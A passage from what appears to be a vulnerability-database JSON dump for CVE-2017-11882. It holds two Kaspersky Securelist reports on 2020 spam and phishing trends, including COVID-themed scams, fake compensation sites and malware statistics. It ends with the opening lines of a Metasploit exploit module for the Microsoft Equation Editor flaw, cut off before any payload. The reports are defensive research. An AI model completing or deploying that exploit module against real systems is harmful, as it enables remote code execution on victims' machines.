scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151841/2020_spam_report_23.png>)\n\nWhere messages were signed as being from a lawyer trying to find a new owner for no-man&#x27;s capital, the sender emphasized that the late owner of the fortune had died of COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151909/2020_spam_report_24.png>)\n\n### An unusual turn of events\n\nRegular &quot;Nigerian&quot; scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter&#x27;s effort to collect postcards from around the world. The key point of this kind of messages is to get the potential victim to reply: the &quot;mother&#x27;s&quot; request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them to partake in a large amount of money by paying a small upfront fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151937/2020_spam_report_25.png>)\n\n&quot;Nigerian&quot; scammers are not the only ones that have been getting creative. Spammers who sent out their messages [through website feedback forms](<https://www.kaspersky.com/blog/contact-form-spam/27880/>) employed yet another unusual trick. The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09152003/2020_spam_report_26.png>)\n\nThe deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible, while pondering on the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with the users reporting that they immediately tried checking what photographs they had &quot;stolen&quot;. The links were not functional at the time the &quot;complaints&quot; were discovered, but in all likelihood, they had previously linked to malicious files or phishing programs.\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nThe share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.\n\n_Proportion of spam in global email traffic, 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160317/01-en-spam-report-2020.png>))_\n\nThe percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%), in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.\n\n### Sources of spam by country\n\nThe group of ten countries where the largest volumes of spam originated went through noticeable change in 2020. United States and China, which had shared first and second places (10.47% and 6.21%, respectively) in the previous three years, dropped to third and fourth. The &quot;leader&quot; was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 percentage points ahead of the United States.\n\n_Sources of spam by country in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160358/03-en-spam-report-2020.png>))_\n\nFrance gained 2.97 p.p. as compared to the year 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sunk to seventh place with 3.26%. The other countries in last year&#x27;s &quot;top ten&quot;, India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which skipped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).\n\n### Malicious email attachments\n\n_Attacks blocked by the email antivirus in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160429/04-en-spam-report-2020.png>))_\n\nIn 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, fell on March, while December was the quietest month, with 11,971,944 malicious attachments, as it was in 2019.\n\n#### Malware families\n\n_TOP 10 malware families in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160458/05-en-spam-report-2020.png>))_\n\nMembers of the [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors, capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family was second with 7.70%. It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.\n\nEquation Editor vulnerability exploits, [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>), dropped to third place with 6.55 percent. This family had topped the ranking of malware spread through spam in the previous two years.\n\n[Trojan.MSOffice.SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script, which runs PowerShell to download other malware secretly.\n\nIn fifth place, with 2.66%, were [Backdoor.Win32.Androm](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>) modular backdoors, which, too, are frequently utilized for delivering other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The [Worm.Win32.WBVB](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: [Trojan.Win32.Kryptik](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Kryptik/>) trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while [Trojan.MSIL.Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.\n\n_TOP 10 malicious email attachments in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160528/06-en-spam-report-2020.png>))_\n\nThe rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences. Thus, our solutions detected the exploit that targeted the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, switched positions, too. Androm-family backdoors missed the &quot;top ten&quot; entirely, but the Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the families rankings, was tenth.\n\n### Countries targeted by malicious mailshots\n\nSpain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result of this, Germany, which had topped the rankings since 2015, dropped to second place with 7.28% and Russia, with 6.29%, to third.\n\n_Countries targeted by malicious mailshots in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160559/07-en-spam-report-2020.png>))_\n\nItaly&#x27;s share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, 2.34%, landed in eleventh place last year.\n\n## Statistics: phishing\n\nIn 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019. A total of 13.21% of Kaspersky users were attacked worldwide, with 6,700,797 masks describing new phishing websites added to the system database.\n\n### Attack geography\n\nIn 2020, Brazil regained its leadership by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.\n\n_Geography of phishing attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160628/08-en-spam-report-2020.png>))_\n\n#### TOP 10 countries by number of attacked users\n\nThe countries with the largest numbers of attempts at opening phishing websites in 2018 &quot;topped the rankings&quot; again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries&#x27; indicators dropped remarkably from 2019, Brazil &quot;losing&quot; 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten &quot;leaders&quot; since 2015, was in third place with 17.90%.\n\nVenezuela, last year&#x27;s &quot;leader&quot;, had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.\n\n**Country** | **Share of attacked users (%)*** \n---|--- \nBrazil | 19.94 \nPortugal | 19.73 \nFrance | 17.90 \nTunisia | 17.62 \nFrench Guiana | 17.60 \nQatar | 17.35 \nCameroon | 17.32 \nVenezuela | 16.84 \nNepal | 16.72 \nAustralia | 16.59 \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020_\n\n### Top-level domains\n\nMost scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the &quot;top ten&quot; are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, with Germany&#x27;s .de, (1.23%), and Great Britain&#x27;s .co.uk (1.20%) in fourth and fifth places, respectively. In sixth place was the Indian domain extension .in, with 1.10%, followed by France&#x27;s .fr with 1.08%, and Italy&#x27;s .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.\n\n_Most frequent top-level domains for phishing pages in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160706/09-en-spam-report-2020.png>))_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab&#x27;s Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nLast year&#x27;s events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a &quot;modest&quot; 10.72%.\n\nOnline games and government and taxes dropped out of the &quot;top ten&quot; in 2020. They were replaced by delivery companies and financial services.\n\n_Distribution of organizations targeted by phishers, by category in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09160754/10-en-spam-report-2020.png>))_\n\n## Conclusion\n\nWith its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics. Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with &quot;new corporate services&quot;. Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.\n\nThe general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the remote work mode, increasingly popular, makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received by their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.", "cvss3": {}, "published": "2021-02-15T10:00:38", "type": "securelist", "title": "Spam and phishing in 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2021-02-15T10:00:38", "id": "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "href": "https://securelist.com/spam-and-phishing-in-2020/100512/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-26T11:50:09", "description": "\n\n## Quarterly highlights\n\n### Don't get burned\n\nBurning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202244/sl_spam_report_11.png>)\n\nScammers tried to make their website as close as possible to the original \u2014 even the page with the ticket description looked genuine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202316/sl_spam_report_12.png>)\n\nThere were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were \"sold\" without prior registration, and the price was a steal ($225 versus $475).\n\n### Oscar-winning scammers\n\nFebruary 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202400/sl_spam_report_13.png>)\n\nTo promote these sites, Twitter accounts were created \u2014 one for each nominated film.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202431/sl_spam_report_14.png>)\n\nCurious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202503/sl_spam_report_15.png>)\n\nDuring registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202534/sl_spam_report_16.png>)\n\nUsers should be alert to the use of short links in posts on social networks. Scammers often use them because it's impossible to see where a shortened URL points without actually following it.\n\nThere are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.\n\n### ID for hire\n\nUS companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202917/sl_spam_report_40.png.jpg>)\n\nInspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was \"yes\" even if the input was gibberish), they were promised compensation \"for the leakage of personal data.\"\n\nTo receive \"compensation,\" the victim's citizenship was of no consequence \u2014 what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people's data to claim compensation popped up obsessively on the page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203248/sl_spam_report_41.jpg>)\n\nTo receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words \"I'am don't have SSN\" (the mistakes are a good indicator of a fake), whereupon they were invited to \"rent\" an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203357/sl_spam_report_42.jpg>)\n\nAfter that, the potential victim was redirected to a payment page with the amount and currency based on the user's location. For instance, users in Russia were asked to pay in rubles.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203504/sl_spam_report_43.jpg>)\n\nThe scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.\n\n## Disaster and pandemic\n\n### Fires in Australia\n\nThe natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one \"Nigerian prince\"-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman's account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203546/sl_spam_report_21.png>)\n\nBesides the fictional millionaire, other \"nature lovers\" were keen to help out \u2014 their e-mails were more concise, but the scheme was essentially the same.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203616/sl_spam_report_22.png>)\n\n### COVID-19\n\n#### \"Nigerian prince\" scheme\n\nCOVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purpsoses. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203723/sl_spam_report_23.png>)\n\n#### Bitcoin for coronavirus\n\nHaving introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203816/sl_spam_report_24.png>)\n\nIn one e-mail, the attackers played on people's fear of contracting COVID-19: the message was from an unnamed \"neighbor\" claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer's parents).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203854/sl_spam_report_25.png>)\n\n#### Dangerous advice from the WHO\n\nOne fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203939/sl_spam_report_26.png>)\n\nTo get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204032/sl_spam_report_27.png>)\n\nIn addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204128/sl_spam_report_28.png>)\n\nThere were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204203/sl_spam_report_29.png>)\n\n \n\n#### Corporate segment\n\nThe coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and required to check attached files immediately.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204258/sl_spam_report_30.png>)\n\nAnother mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. After which it asked for a form to be filled out, otherwise the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained [Trojan-PSW.MSIL.Agensla.a](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204343/sl_spam_report_31.png>)\n\nWe also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim's corporate mail account were required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204434/sl_spam_report_32.png>)\n\n#### Government compensation\n\nThe introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.\n\nOne such popular scheme was [highlighted](<https://twitter.com/assolini/status/1242054069193183235>) by a colleague of ours from Brazil. A WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204543/sl_spam_report_34.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204614/sl_spam_report_35.png>)\n\nGiven that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.\n\n#### Anti-coronavirus protection with home delivery\n\nDue to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204656/sl_spam_report_36.png>)\n\nIn Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204722/sl_spam_report_37.png>)\n\nThe number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204747/sl_spam_report_38.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204823/sl_spam_report_39.png>)\n\nOn average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212717/sl_spam_report_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.\n\n_Proportion of spam in Runet mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212802/sl_spam_report_02-en-dolya-spama-v-pochtovom-trafike-runeta-q4-2019-q1-2020-g.png>)_\n\nIn Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).\n\n## Sources of spam by country\n\n \n\n_Sources of spam by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212844/sl_spam_report_03-en-strany-istochniki-spama-v-mire-pervyj-kvartal-2020-g.png>)_\n\nIn Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.\n\nBrazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.\n\n### Spam e-mail size\n\n \n\n_Spam e-mail size, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212928/sl_spam_report_04-en-razmery-spamovyh-pisem-vtoroj-i-tretij-kvartaly-2019-g.png>)_\n\nCompared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.\n\nMeanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100\u2013200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.\n\n### Malicious attachments in e-mail\n\n \n\n_Number of Mail Anti-Virus triggerings, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213009/sl_spam_report_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).\n\n_TOP 10 malicious attachments in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213057/sl_spam_report_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-pervyj-kvartal-2020-g.png>)_\n\nIn Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.\n\n_TOP 10 malicious families in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213137/sl_spam_report_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-pervyj-kvartal-2020.png>)_\n\nAs regards malware families, the most widespread this quarter was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (12.51%), with [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and [Worm.Win32.wbvb](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) (4.65%) in third.\n\n### Countries targeted by malicious mailshots\n\n \n\n_Distribution of Mail Anti-Virus triggerings by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213218/sl_spam_report_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-pervyj-kvartal-2020-g.png>)_\n\nFirst place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.\n\n## Statistics: phishing\n\nIn Q1 2020, the Anti-Phishing system prevented **119,115,577** attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.\n\n### Attack geography\n\nThe country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).\n\n_Geography of phishing attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213300/sl_spam_report_09-en-geografiya-fishingovyh-atak-pervyj-kvartal-2020-goda.png>)_\n\nIn second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.\n\n**Country** | **%*** \n---|--- \nVenezuela | 20.53% \nBrazil | 14.95% \nAustralia | 13.71% \nPortugal | 12.98% \nAlgeria | 12.12% \nFrance | 11.71% \nHonduras | 11.62% \nGreece | 11.58% \nMyanmar | 11.54% \nTunisia | 11.53% \n \n_* Share of users on __whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky products Anti-Phishing component. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of a malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThe largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.\n\n_Distribution of organizations affected by phishing attacks by category, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213351/sl_spam_report_10-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-pervyj-kvartal-2020-g.png>)_\n\nAs for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.\n\n## Conclusion\n\nGlancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on \"standard\" fake pages and in spam mailings.\n\nThe topic is also used extensively in fraudulent schemes offering compensation and material assistance.\n\nIt is highly likely that this type of fraud will become more frequent.\n\nThe average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.\n\nTop of this quarter's list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.", "cvss3": {}, "published": "2020-05-26T10:00:50", "type": "securelist", "title": "Spam and phishing in Q1 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-05-26T10:00:50", "id": "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "href": "https://securelist.com/spam-and-phishing-in-q1-2020/97091/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-09T21:28:48", "description": "This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction.", "cvss3": {}, "published": "2017-12-06T00:00:00", "type": "zdt", "title": "Microsoft Office Equation Editor Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-12-06T00:00:00", "id": "1337DAY-ID-29119", "href": "https://0day.today/exploit/description/29119", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Office 